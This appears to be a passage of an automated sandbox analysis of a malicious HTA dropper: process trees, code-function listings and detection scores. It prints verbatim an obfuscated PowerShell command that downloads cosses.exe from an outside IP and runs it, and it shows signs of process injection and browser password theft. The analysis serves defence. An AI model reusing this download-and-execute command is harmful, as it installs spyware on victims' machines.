                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C336111_2_026C3361
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C335811_2_026C3358
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026E20E111_2_026E20E1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C18CD11_2_026C18CD
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C16D111_2_026C16D1
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C9D2111_2_026C9D21
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C358111_2_026C3581
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeCode function: 11_2_026C158111_2_026C1581
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B053512_2_052B0535
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537059112_2_05370591
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536244612_2_05362446
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535E4F612_2_0535E4F6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B077012_2_052B0770
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052D475012_2_052D4750
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AC7C012_2_052AC7C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CC6E012_2_052CC6E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A010012_2_052A0100
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534A11812_2_0534A118
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0533815812_2_05338158
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053701AA12_2_053701AA
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053681CC12_2_053681CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536A35212_2_0536A352
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053703E612_2_053703E6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BE3F012_2_052BE3F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535027412_2_05350274
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053302C012_2_053302C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BAD0012_2_052BAD00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C8DBF12_2_052C8DBF
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AADE012_2_052AADE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B0C0012_2_052B0C00
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05350CB512_2_05350CB5
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A0CF212_2_052A0CF2
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F2F2812_2_052F2F28
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052D0F3012_2_052D0F30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05324F4012_2_05324F40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0532EFA012_2_0532EFA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BCFE012_2_052BCFE0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A2FC812_2_052A2FC8
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536EE2612_2_0536EE26
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B0E5912_2_052B0E59
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536CE9312_2_0536CE93
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C2E9012_2_052C2E90
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536EEDB12_2_0536EEDB
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052C696212_2_052C6962
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B29A012_2_052B29A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537A9A612_2_0537A9A6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BA84012_2_052BA840
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B284012_2_052B2840
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052968B812_2_052968B8
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052DE8F012_2_052DE8F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536AB4012_2_0536AB40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05366BD712_2_05366BD7
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052AEA8012_2_052AEA80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536757112_2_05367571
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534D5B012_2_0534D5B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F43F12_2_0536F43F
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052A146012_2_052A1460
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F7B012_2_0536F7B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053616CC12_2_053616CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052E516C12_2_052E516C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0529F17212_2_0529F172
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0537B16B12_2_0537B16B
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052BB1B012_2_052BB1B0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536F0E012_2_0536F0E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053670E912_2_053670E9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B70C012_2_052B70C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535F0CC12_2_0535F0CC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536132D12_2_0536132D
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0529D34C12_2_0529D34C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F739A12_2_052F739A
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B52A012_2_052B52A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_053512ED12_2_053512ED
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CB2C012_2_052CB2C0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05367D7312_2_05367D73
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B3D4012_2_052B3D40
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05361D5A12_2_05361D5A
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CFDC012_2_052CFDC0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05329C3212_2_05329C32
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FCF212_2_0536FCF2
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FF0912_2_0536FF09
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FFB112_2_0536FFB1
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B1F9212_2_052B1F92
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B9EB012_2_052B9EB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B995012_2_052B9950
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CB95012_2_052CB950
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0531D80012_2_0531D800
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052B38E012_2_052B38E0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FB7612_2_0536FB76
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052CFB8012_2_052CFB80
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05325BF012_2_05325BF0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052EDBF912_2_052EDBF9
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05323A6C12_2_05323A6C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_05367A4612_2_05367A46
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0536FA4912_2_0536FA49
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_052F5AA012_2_052F5AA0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0534DAAC12_2_0534DAAC
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0535DAC612_2_0535DAC6
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_03241F7012_2_03241F70
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B39C12_2_0323B39C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B1A012_2_0323B1A0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323B05012_2_0323B050
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323D05012_2_0323D050
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032437F012_2_032437F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_032455F012_2_032455F0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0325BBB012_2_0325BBB0
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323CE2712_2_0323CE27
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0323CE3012_2_0323CE30
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E74C12_2_0500E74C
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E3B412_2_0500E3B4
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500E29412_2_0500E294
                  Source: C:\Windows\SysWOW64\calc.exeCode function: 12_2_0500D81812_2_0500D818
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 36 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 85 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 268 times
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 89 times
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: String function: 00138900 appears 42 times
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: String function: 00130AE3 appears 70 times
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: String function: 00117DE1 appears 35 times
                  Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 052E5130 appears 37 times
                  Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 0529B970 appears 272 times
                  Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 0532F290 appears 105 times
                  Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 052F7E54 appears 98 times
                  Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 0531EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@18/16@15/10
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017A06A GetLastError,FormatMessageW,6_2_0017A06A
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001681CB AdjustTokenPrivileges,CloseHandle,6_2_001681CB
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_001687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_001687E1
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_0017B333
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0018EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0018EE0D
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_0017C397 CoInitialize,CoCreateInstance,CoUninitialize,6_2_0017C397
                  Source: C:\Users\user\AppData\Roaming\cosses.exeCode function: 6_2_00114E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00114E89
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cosses[1].exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8776:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1jzkvlz.24s.ps1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: calc.exe, 0000000C.00000003.1864890428.0000000003464000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1864762177.0000000003443000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3816500953.0000000003491000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000002.3816500953.0000000003464000.00000004.00000020.00020000.00000000.sdmp, calc.exe, 0000000C.00000003.1866948572.000000000346E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: clearpicturewithmebestthingsforgivenmebest.htaVirustotal: Detection: 40%
                  Source: clearpicturewithmebestthingsforgivenmebest.htaReversingLabs: Detection: 27%
                  Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\clearpicturewithmebestthingsforgivenmebest.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosses.exe "C:\Users\user\AppData\Roaming\cosses.exe"
                  Source: C:\Users\user\AppData\Roaming\cosses.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\cosses.exe"
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exeProcess created: C:\Windows\SysWOW64\calc.exe "C:\Windows\SysWOW64\calc.exe"
                  Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshell.exE -ex bypAss -Nop -w 1 -C deViCeCredEnTiAldePLOymenT ; iEx($(Iex('[sYsTEm.TeXt.EncoDIng]'+[CHAR]0x3a+[ChaR]0X3A+'UTf8.gEtStrINg([SySteM.cOnvERT]'+[chAR]58+[ChAr]0X3a+'FromBAse64STriNg('+[Char]34+'JGoxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRFRmlOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtmLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiaGZ1dnVwcENOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1YmpCb2gsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdXRNSGFlLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnZ3dvdmVvT1hKKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRoblIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkajE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNC81MzAvY29zc2VzLmV4ZSIsIiRFblY6QVBQREFUQVxjb3NzZXMuZXhlIiwwLDApO3N0YVJ0LVNsRUVQKDMpO2ludk9rZS1pdGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcY29zc2VzLmV4ZSI='+[Char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fjq1drut\fjq1drut.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosses.exe "C:\Users\user\AppData\Roaming\cosses.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A73.tmp" "c:\Users\user\AppData\Local\Temp\fjq1drut\CSC5A43CF9668DC424F8B475C31EBB405.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cosses.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\cosses.exe" Jump to behavior
